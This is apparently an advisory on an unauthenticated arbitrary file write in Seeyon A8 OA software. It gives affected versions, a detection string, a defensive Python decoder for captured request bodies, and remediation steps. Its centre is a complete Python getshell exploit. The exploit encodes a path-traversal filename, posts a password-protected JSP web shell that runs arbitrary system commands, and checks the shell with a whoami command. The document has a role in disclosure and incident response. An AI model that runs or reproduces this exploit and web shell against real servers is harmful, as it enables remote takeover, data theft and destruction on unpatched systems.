Seeyon (致遠) A8 arbitrary file write vulnerability: getshell exp

Several versions of the Seeyon OA system were recently reported to contain an arbitrary file write vulnerability. Without logging in, a remote attacker can POST specially crafted data to the URL /seeyon/htmlofficeservlet and write an arbitrary file onto the target server; once the write succeeds, arbitrary system commands can be executed and the server taken over.

 

Versions currently known to be affected:

Seeyon A8-V5 Collaborative Management Software V6.1sp1
Seeyon A8+ Collaborative Management Software V7.0, V7.0sp1, V7.0sp2, V7.0sp3
Seeyon A8+ Collaborative Management Software V7.1

 

An attacker who successfully exploits this vulnerability can write arbitrary files on the target system, execute arbitrary code, and modify or delete data.

Note that the system runs with very high default privileges, so successful exploitation can do a great deal of damage.

 

To check whether a system is vulnerable, request the URL /seeyon/htmlofficeservlet; if the following content is returned, the vulnerability may be present:

DBSTEP V3.0     0            21               0             htmoffice operate errjava

 

Below is a PoC seen in the wild:

This PoC is for study and research only; do not use it to damage other people's computers!

The PoC first encodes the path of the file to be written, then uses the encoded path to write an arbitrary file (getshell).

Python:

#coding=utf-8
import sys
import requests


def encode(origin_bytes):
    """
    Re-implemented base64 encoding function (custom alphabet)
    """
    # convert each byte into an 8-bit binary string
    base64_charset = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"
    base64_bytes = ['{:0>8}'.format(bin(ord(b)).replace('0b', '')) for b in origin_bytes]

    resp = ''
    nums = len(base64_bytes) // 3
    remain = len(base64_bytes) % 3

    integral_part = base64_bytes[0:3 * nums]
    while integral_part:
        # take three bytes and split them into four 6-bit integers
        tmp_unit = ''.join(integral_part[0:3])
        tmp_unit = [int(tmp_unit[x: x + 6], 2) for x in [0, 6, 12, 18]]
        # look up the corresponding base64 characters
        resp += ''.join([base64_charset[i] for i in tmp_unit])
        integral_part = integral_part[3:]

    if remain:
        # pad up to three bytes, each padding byte being 0000 0000
        remain_part = ''.join(base64_bytes[3 * nums:]) + (3 - remain) * '0' * 8
        # take three bytes and split them into four 6-bit integers
        # 1 remaining byte yields 2 base64 chars plus "=="; 2 remaining bytes yield 3 chars plus "="
        tmp_unit = [int(remain_part[x: x + 6], 2) for x in [0, 6, 12, 18]][:remain + 1]
        resp += ''.join([base64_charset[i] for i in tmp_unit]) + (3 - remain) * '='

    return resp


def getshell(urls):
    url = urls + "/seeyon/htmlofficeservlet"
    headers = {
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Connection": "close",
    }
    # encoded path of the file to be written (relative to the servlet's working directory)
    file_name = encode('..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\checkload32.jsp')
    payload = """DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV\r
OPTION=S3WYOSWLBSGr\r
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r
CREATEDATE=wUghPB3szB3Xwg66\r
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r
originalFileId=wV66\r
originalCreateDate=wUghPB3szB3Xwg66\r
FILENAME=""" + file_name + """\r
needReadFile=yRWZdAS6\r
originalCreateDate=wLSGP4oEzLKAz4=iz=66\r
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("zs".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce"""
    requests.post(url=url, data=payload, headers=headers)
    # verify the write by requesting the dropped page
    result = requests.get(urls + "/seeyon/checkload32.jsp?pwd=zs&cmd=cmd+/c+echo+ZuoShou_Jsp_Shell")
    if 'ZuoShou_Jsp_Shell' in result.text:
        print(u'Jsp:Getshell成功\t{}'.format(urls + "/seeyon/checkload32.jsp?pwd=zs&cmd=cmd /c whoami"))
    else:
        print(u'Getshell失敗')


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print(u"\t\t用法:python poc.py 'http://localhost'")
    else:
        url = sys.argv[1]
        getshell(url)
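For responders who have a captured htmlofficeservlet request body (WAF log, IDS pcap), here is an added example that is not part of the original post or of the vendor's code: a decoder for the PoC's custom base64 alphabet that decodes every KEY=token field, recovers the FILENAME path and flags the traversal-plus-JSP pattern. It goes slightly beyond the PoC in that it also accepts a trailing '6' as padding, because the page's own fields (needReadFile=yRWZdAS6, originalFileId=wV66) only decode to plain text that way; the alphabet and those tokens come from the page, the sample body is constructed, and the function names are assumptions.

```python
import base64
import re

# Alphabet from the PoC above. '=' is a DATA symbol (index 32); the 65th char '6'
# is never emitted by the PoC's encoder, yet the page's own fields (e.g.
# needReadFile=yRWZdAS6) decode to text only with a trailing '6' read as padding.
SEEYON_ALPHABET = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"
STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
TO_SEEYON = str.maketrans(STD_ALPHABET, SEEYON_ALPHABET[:64])
TO_STD = str.maketrans(SEEYON_ALPHABET[:64], STD_ALPHABET)
FIELD = re.compile(r"^(\w+)=(\S+)\r?$", re.M)


def seeyon_encode(data: bytes, pad: str = "=") -> str:
    """Standard base64 bit layout with the PoC alphabet; pad="=" matches the PoC."""
    std = base64.b64encode(data).decode("ascii")
    n = std.count("=")
    return std.rstrip("=").translate(TO_SEEYON) + pad * n


def seeyon_decode(token: str) -> list:
    """All byte strings that encode to token ('6' pads are unambiguous; '=' may be data)."""
    n6 = len(token) - len(token.rstrip("6"))
    found = []
    for pad in ([n6] if n6 else [0, 1, 2]):
        body = token[:len(token) - pad]
        try:
            raw = base64.b64decode(body.translate(TO_STD) + "=" * pad, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if seeyon_encode(raw, "6" if n6 else "=") == token and raw not in found:
            found.append(raw)
    return found


def decode_fields(body: str) -> dict:
    """Decode every KEY=token line of a captured body, preferring printable candidates."""
    out = {}
    for key, token in FIELD.findall(body):
        cands = [c.decode("latin-1") for c in seeyon_decode(token)]
        printable = [c for c in cands if c.isprintable()]
        out[key] = (printable or cands or [None])[0]
    return out


def webshell_write(fields: dict) -> bool:
    """Traversal plus a web-executable extension in FILENAME: the pattern this page describes."""
    path = fields.get("FILENAME") or ""
    return ".." in path and path.lower().rsplit(".", 1)[-1] in ("jsp", "jspx")


# Constructed sample in the DBSTEP layout the PoC sends (not a real capture).
SAMPLE_BODY = ("DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV\r\noriginalFileId=wV66\r\nFILENAME="
               + seeyon_encode(b"..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\checkload32.jsp")
               + "\r\nneedReadFile=yRWZdAS6\r\n")
```

decode_fields(SAMPLE_BODY) yields needReadFile "false", originalFileId "1" and the traversal path, and webshell_write() on it returns True; tokens ending in '=' may legitimately decode to more than one byte string, which is why seeyon_decode returns a list.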

 

Remediation:

1: Restrict access to the path /seeyon/htmlofficeservlet on the server

2: Contact the vendor promptly and apply the official patch: http://www.seeyon.com/Info/constant.html
